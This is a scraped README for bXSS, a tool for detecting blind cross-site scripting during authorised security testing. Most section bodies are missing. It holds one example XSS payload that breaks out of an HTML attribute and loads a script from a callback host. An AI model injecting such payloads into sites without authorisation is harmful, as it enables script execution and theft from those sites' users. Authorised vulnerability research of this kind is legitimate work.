Home

Awesome

bXSS

<!-- prettier-ignore-start -->

<a href="https://codeclimate.com/github/LewisArdern/bXSS/maintainability"><img src="https://api.codeclimate.com/v1/badges/a8e30934a0be1952891c/maintainability" /></a> <a href="https://lgtm.com/projects/g/LewisArdern/bXSS/context:javascript"><img alt="Language grade: JavaScript" src="https://img.shields.io/lgtm/grade/javascript/g/LewisArdern/bXSS.svg?logo=lgtm&logoWidth=18"/></a>

<!-- prettier-ignore-end -->

bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.

bXSS supports the following:

Requirements

Necessary

Optional

Set-Up

Default

Configuring Services

Services are optional, by default bXSS will save a markdown file to disk. If you don't want to use any service documented below, just delete the service from the config.

Setting Up HTTPS

Consider using a reverse proxy, for example in NGINX, but if you want to configure HTTPS using express, follow the steps below:

Starting The Application

Once you have configured the above, simply start the server with any available utility at the application root directory:

Using

Once the application is functional, you would just identify sites you are authorized to test and start to inject different payloads that will attempt to load your resource, the easiest example is:

"><script src="https://example.com/m"></script>

The application has the following routes:

Contribute?

If you like the project, feel free to contribute or if you want to suggest improvements or notice any problems, file a issue.